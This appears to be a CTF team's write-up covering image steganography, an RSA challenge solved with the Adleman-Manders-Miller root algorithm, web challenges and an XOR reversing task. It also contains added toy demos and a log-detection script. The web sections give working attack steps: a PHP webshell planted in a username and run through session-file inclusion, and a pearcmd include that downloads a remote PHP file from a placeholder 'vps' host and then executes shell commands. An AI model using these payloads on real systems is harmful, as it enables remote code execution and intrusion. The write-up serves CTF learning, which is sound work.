Misc
Fun Encoding (好玩的编码)
happyImg
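Hidden data was found in the red and blue channels, and the green channel holds a password.
The hidden data is in archive format. Export the archive; the extraction password is !QAZXSW@1qazxsw2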
Network Tracing (网络追踪)
+774
Crypto
3DES
HAPPYRSA
# from Crypto.Util.number import bytes_to_long
# from flag import flag
p = 97559992143538505823351615639211763734311559951587665014345919747733390740450790273359386575890798160795025626573580365828156108078100621074495137190416226109270591884516099679926053478560750986193065549865131400457769381398338702594631516054868885157801055786648957386508374821243393633398068286519087291899
e = 223
q = 305441694023646712448997551501420161654473174790323208128426716523786159389593732096324499033892465876683490515456465981922248571768795221792067055550876465089846480000103207743072486330333647531692833975457277965585913100536970416049033758578728704151353769882703817603346904165274693820583811661679269246933
n = p * q
# assert(flag.startswith('flag'))
# m = bytes_to_long(flag.encode())
# c = pow(m, e, n)
# print(c)
c = 8310151988085860771226135398874764307621316769660563267495107758782855420167201345224621932233009864886459191650276831555553606018772356624861344010051427084784712615419584399034171295434663517111130692609510225248850800086750351336299722121740091690781297611587292792380263994661373171593543809045588215109967008287273462651359353786188222933360961215432623197670015133463997036747979075992284955864774118038735419327630590319728196257908297742808557311174379279085833900573941668601788656519597930019583786869324790276024107739682158108450127890693464079075924933789639419538796893294354565682012619667240947317948
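import random
from Crypto.Util.number import long_to_bytes

def GF(a):
    # Set the modulus used by g(); this overwrites the challenge's global p.
    global p
    p = a

def g(a, b):
    # Modular exponentiation in GF(p).
    global p
    return pow(a, b, p)

def AMM(x, e, p):
    # Adleman-Manders-Miller: all e-th roots of x modulo the prime p
    # (e prime, e must divide p - 1).
    GF(p)
    # Pick y that is not an e-th power residue.
    y = random.randint(1, p - 1)
    while g(y, (p - 1) // e) == 1:
        y = random.randint(1, p - 1)
    # Write p - 1 = e^t * s with e not dividing s.
    t = 0
    s = p - 1
    while s % e == 0:
        t += 1
        s //= e
    # Find alpha with e * alpha = 1 (mod s).
    k = 1
    while (s * k + 1) % e != 0:
        k += 1
    alpha = (s * k + 1) // e
    a = g(y, (e ** (t - 1)) * s)  # primitive e-th root of unity
    b = g(x, e * alpha - 1)
    c = g(y, s)
    h = 1
    for i in range(1, t):
        d = g(b, e ** (t - 1 - i))
        if d == 1:
            j = 0
        else:
            # j = -log_a(d) in the subgroup of order e; e is small, so brute force.
            j = -next(n for n in range(e) if g(a, n) == d) % e
            b = b * g(g(c, e), j) % p
            h = h * g(c, j) % p
        c = g(c, e)
    root = g(x, alpha) * h % p
    # Multiply one root by every e-th root of unity to get all of them.
    roots = set()
    for i in range(e):
        roots.add(root * g(a, i) % p)
    return roots

def check(m):
    return 'flag' in m

# Work modulo q only: this assumes the flag, as an integer, is smaller than q.
mps = AMM(c, e, q)
for mpp in mps:
    flag = str(long_to_bytes(mpp))
    if check(flag):
        print(flag)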
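Why no ordinary private exponent exists for a key like this, and how the roots are taken modulo one prime in the simple case where e divides q - 1 exactly once, as an added example that is not part of the original write-up. The two Mersenne primes, the 3-byte message and all function names are constructed for illustration; they are not the challenge values.

```python
import math

# Constructed toy key (not the challenge values): two Mersenne primes, e = 7.
P = 2**17 - 1   # 7 does not divide P - 1
Q = 2**31 - 1   # 7 divides Q - 1 exactly once
E = 7


def has_private_exponent(e, p, q):
    """True when e is invertible mod (p-1)(q-1), i.e. d = e^-1 exists."""
    return math.gcd(e, (p - 1) * (q - 1)) == 1


def eth_roots_mod_prime(c, e, q):
    """All e-th roots of c mod prime q, for prime e dividing q-1 exactly once."""
    s, rem = divmod(q - 1, e)
    if rem or s % e == 0:
        raise ValueError("requires e | q-1 and e*e not dividing q-1")
    c %= q
    if c == 0:
        return {0}
    if pow(c, s, q) != 1:
        return set()                 # c is not an e-th power mod q
    alpha = pow(e, -1, s)            # e*alpha = 1 (mod s); needs Python 3.8+
    root = pow(c, alpha, q)          # root^e = c * (c^s)^k = c
    y = 2
    while pow(y, s, q) == 1:         # search for an e-th non-residue
        y += 1
    z = pow(y, s, q)                 # element of order e
    return {root * pow(z, i, q) % q for i in range(e)}


def recover(c, e, q, looks_right):
    """Candidates m < q with m^e = c (mod q) that pass a plaintext check."""
    out = []
    for r in sorted(eth_roots_mod_prime(c, e, q)):
        data = r.to_bytes((r.bit_length() + 7) // 8, "big")
        if looks_right(data):
            out.append(data)
    return out


if __name__ == "__main__":
    m = int.from_bytes(b"ctf", "big")          # constructed message, m < Q
    c = pow(m, E, P * Q)
    print(has_private_exponent(E, P, Q))
    print(recover(c, E, Q, lambda d: d.startswith(b"ct")))
```

The plaintext check plays the role of the 'flag' substring test in the solve script: each ciphertext has e candidate roots modulo q, and only the known format picks out the real one.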
Web
Web1
LZAS46MXDWvzVF1uDD61KMu3PBBYfQkK<font color="red"><h1>f</h1></font>NEHCkNwzFniTV9atD84Et8yDahvOcmhU
2aBmuGdlU4EFud68bNS90NVduB7qt81l<font color="red"><h1>l</h1></font>fDLwVypO109Ow1OeKYFkE1KlBt3M5zev
Lxy8LrMIbcZa7loZM08E7TPQYHyoP2KW<font color="red"><h1>a</h1></font>qYnGbVauit5bzoJ21xZRyKKsCvc9XEIx
SbvEaj4cj3bZ0mwSW0frvrJ5gWEmXqJ9<font color="red"><h1>g</h1></font>HiCalmJXU3hYCKrxkINwuIWrEQIO6znc
Cho2U1whqZVbmpWPqCTi0M6uXKTgeYz7<font color="red"><h1>{</h1></font>rdFjzGNrONdSTID0CA5dh9a8eIRI4osT
PUhn248i8WHE7ndNDOYfaJqOdog4YhaZ<font color="red"><h1>1</h1></font>t2Uq5xh6dv2jopjQboI86Wd8FKPxvmJi
di4xlyVVWu8jCqspZH2606aMOpsSEQbP<font color="red"><h1>5</h1></font>yPEZrOI1I4fL4tMPOk4FeZfak2PhLrGc
6kkxvURaRiRGvg8YUDDERi1SHDXTtZYh<font color="red"><h1>8</h1></font>Lzmp24EVDdJ6eXneSC1GXcbbiuD0bB45
tvnIR8wOScnJ0Q2cqNb2Aljf444LnqhY<font color="red"><h1>0</h1></font>RlL84YxMqZHaOenkQl4BW1ZgsdgRBdZg
ckDQggrNzb8z9PECsdOPJd8gM7pD9XiP<font color="red"><h1>8</h1></font>dwMu0A4KCpvMW1Xrt6eWpeMZF4Nk1DCm
tRmvQYVOzffP6fIIXQoM7Bj0P35jCD5y<font color="red"><h1>2</h1></font>nrQHN7YYTGAYJfKyXwgiTJ4vhcO3nfcR
2eGTHR079XGkf0aVQrvQlDakOCsMSS6o<font color="red"><h1>b</h1></font>dk3wLwlOQg1eUxaDIrPJn4Mn7SFbIBWV
FK4mPmYJYq0hYuIg4h6uVVU7oaBoQiFS<font color="red"><h1>6</h1></font>tgiojNAE6BmbzpsWGHb8gWolvTrsUCHD
T1mZ8kYzjkgMbcTSSO75OqRVlOIRuL1N<font color="red"><h1>b</h1></font>8IIePLC52QBrpksgPBWcrkr0TVh1CTBP
FVf2zgy9huHNNfKfR0riVvUcKVAV3Psf<font color="red"><h1>4</h1></font>DWTrEtSfymiuIgunyjmQlxxa89FD5H1A
PrN6uMBaE5KRqvjRdmL7Gw2TzY4YfJVe<font color="red"><h1>c</h1></font>69QszdRFGjwbHO7sqFE7S1FDVuKMY7vu
lt6erK9YZu7ezxBGsrHq95L4ROjmkf1d<font color="red"><h1>a</h1></font>Fb5ekEy4olIwzeHcF9Ir4jlTAK0meX7V
sDpwprVyqeFTGa93rwCsWZKzJh3gbn1q<font color="red"><h1>e</h1></font>DrPYOvsMK3pIQ1Lb9ZoahCQJkBzSZfKO
gM4YngtMoY1mkP3VjHOYu6TSefQxHuXZ<font color="red"><h1>6</h1></font>By6q9xCv02nvszBNJh7N0Lz2ZucJQh24
zvB9n68nAwRmpi4MMlqiJuyQ2qVxt93G<font color="red"><h1>f</h1></font>ofgr7xjXkxbVSqOAr03gXkUD4E3PXUmm
p8nF01qVLoy36rggd1lzkifbXdSqsEEz<font color="red"><h1>1</h1></font>jdVXJ914oHl78ajDZjucnwo9H7ya39oR
4A50pq656g3oEjGskdggYwhHE1tAnhYN<font color="red"><h1>f</h1></font>R0d4CAuh4MT9FQRFxDPs8Oq7CGpzhKQC
ujuzqI9GVieeLIH5OuMEY2p9SZ5MqG0f<font color="red"><h1>6</h1></font>UBh3JcVJ7DY9x8qdegcLyqCIDWxb0vG8
aIcSPRqkawYX6zF9pVjDHVnbrJwwz5AW<font color="red"><h1>7</h1></font>5M2rUXMu4yIWuPU9W0J0PQAfqPtwvLUY
beBtbIkiKOEl9IiC6JC97JWfhiBhjwxo<font color="red"><h1>9</h1></font>rTqNyzLpuYylQoKNr1HtZ6aMDDKmzj0A
mcSuvgDlHkXarL1LVjK4Nr6rtbT8HAmI<font color="red"><h1>f</h1></font>oxHfqDKq4loWxFBDvlPwK7rD4tChjtRx
jOKyVeCgDA7deB2WPyeU7VmKIfDCU0Xd<font color="red"><h1>6</h1></font>xoiQW0SQZ9htnNzqJGILq0YzeylKHNmx
SRRbSUWLZfFIJCdjU45d09ul7kOnG3Lu<font color="red"><h1>7</h1></font>8TOORhaSp84r6e9Wt9Z456fz3mMmVfGw
6IHilO1RL0GH4wPTUHLMLwJKdFaOqZWq<font color="red"><h1>e</h1></font>sS0IdwIjl4pwUAMstuP68fyeCcc7mSJu
hS12vghYNz6Y0thbNAXERMneEB7u7CsA<font color="red"><h1>f</h1></font>ljX7SlFx0xR89aHfGgbFCwwTAoeUYAoB
ZSqdU4mYm09fjkXW3i7upzowyDLim8x3<font color="red"><h1>9</h1></font>lNlbeHhv3ah1PLilXaKAHBgkwEHGWtxG
zm21Gwws8dza5dB3fGjNJKlCiIAW5whm<font color="red"><h1>a</h1></font>7OmC6eTpToRCQa4r7xGHNf5uMcoOhbaK
TXSemjkauiXqr5ws0h9yGeeaWmbVf0f3<font color="red"><h1>6</h1></font>0RlwIiw4PCfzRRL46drk6X9uzsvHgtAV
ZzlXHtJDgA7eEXoCshORONuxqu5hIWUc<font color="red"><h1>e</h1></font>qz6fAUiDhlFxEGoRuJr6wCpzoIBTTxtM
yYcvSTb5qOXKfsZnpF6zTbdxreR6fKsC<font color="red"><h1>6</h1></font>fe7J441n59p4NGqWWO8PGeDZAPBf9l1Q
SEk2YPzE3vSBT78QPTL7H6A1IKbLuUN2<font color="red"><h1>b</h1></font>n4GnXcxjXethzYoBiZlRAZC1R6m4ho0N
f4cJDNmrY3WDtvpbuZ4QL5xeaaO6fIGb<font color="red"><h1>1</h1></font>eiQdgLPXK8r7CfvpLjKhIBjNhIeJUff0
hrSuM0lh3yMQwQ9bKQRhK6Y0JDS0HbmR<font color="red"><h1>}</h1></font>79y8ZcmbuGAbBKdEgZCLsz4fg1UVOMg6
lfi-system
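We then tried using the file inclusion to include the session file, but the session contents could not be controlled. After registering a user we saw the profile file in the back end, and including the session file showed that it contains the username.
After an edit we found it could not be updated, so we decided to register a user with the payload written into the username. Register the user: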
<?php phpinfo();passthru($_POST['1']);?>
Then perform an edit in the back end and include the session file again:
POST /file.php?file=/var/lib/php/sessions/sess_cg4sb0095e1t1m763dou17v0a3 HTTP/1.1
Host: 47.105.39.3:22003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=cg4sb0095e1t1m763dou17v0a3
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

1=cat /flag-b082e9523a1afc68bcb0299e028a5560
onenav
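We found the version file, then went to GitHub and saw the vulnerability in the issues.
Here the c parameter is passed straight to include_once with no filtering at all, and .php is appended to it.
We then considered using pearcmd to download a file remotely.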
http://47.105.39.3:21002/index.php?c=../../../../../../usr/local/lib/php/pearcmd&+install+-R+/var/www/html+http://vps/1.php
http://47.105.39.3:21002/tmp/pear/download/1.php?1=system(%27cat%20/flag*%27)
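Detection logic for the two inclusion patterns described in lfi-system and onenav (a session file passed to an include parameter, and pearcmd reached through an include with arguments in the query string), as an added example that is not part of the original write-up. The log lines, IP addresses, session id, host name and indicator names are constructed.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed access-log lines (documentation IPs, made-up session id and host).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Dec/2020:10:00:01 +0000] "GET /index.php?c=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Dec/2020:10:00:09 +0000] "POST /file.php?file=/var/lib/php/sessions/sess_0123456789abcdef HTTP/1.1" 200 9001',
    '203.0.113.5 - - [01/Dec/2020:10:02:30 +0000] "GET /index.php?c=..%2F..%2F..%2Fusr/local/lib/php/pearcmd&+install+-R+/var/www/html+http://example.invalid/1.php HTTP/1.1" 200 77',
    '203.0.113.5 - - [01/Dec/2020:10:03:00 +0000] "GET /file.php?file=profile HTTP/1.1" 200 300',
]

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SESSION_FILE = re.compile(r"(?:^|/)sess_[A-Za-z0-9,-]+$")


def classify(target):
    """Return the set of inclusion indicators found in one request target."""
    hits = set()
    for part in urlsplit(target).query.split("&"):
        name, sep, value = part.partition("=")
        if not sep:
            # Query text without '=' can become argv when register_argc_argv is on.
            if part.startswith("+"):
                hits.add("argv-style-segment")
            continue
        value = unquote(value)
        if "../" in value:
            hits.add("path-traversal")
        if SESSION_FILE.search(value):
            hits.add("session-file-include")
        if value.lower().rstrip("/").endswith("pearcmd"):
            hits.add("pearcmd-include")
    return hits


def scan(lines):
    """Return (line_number, sorted indicators) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = classify(match.group(1))
            if hits:
                findings.append((number, sorted(hits)))
    return findings
```

On the server side, both patterns disappear when the include target is chosen from a fixed allowlist instead of being built from request input; turning off register_argc_argv removes the argument path into pearcmd.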
RE
GOGOGO
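import base64

crtext = "HAkACxwLUV4KBB8DVQ4CWFFQDVYZBwIPVl5dA1wHQwdRVV5ZVRo="
flag = base64.b64decode(crtext)
print(len(flag))
v = 'zealgiegie'
# Repeating-key XOR: byte i of the decoded data is XORed with v[i % 10].
for i in range(len(flag)):
    # Index expression from the decompiled binary (i % 10 as emitted by the compiler):
    # v9 = i - 10 * ((i + ((i * 0xCCCCCCCCCCCCCCCD)>>64))>>3)
    print(chr(flag[i] ^ ord(v[i % len(v)])), end='')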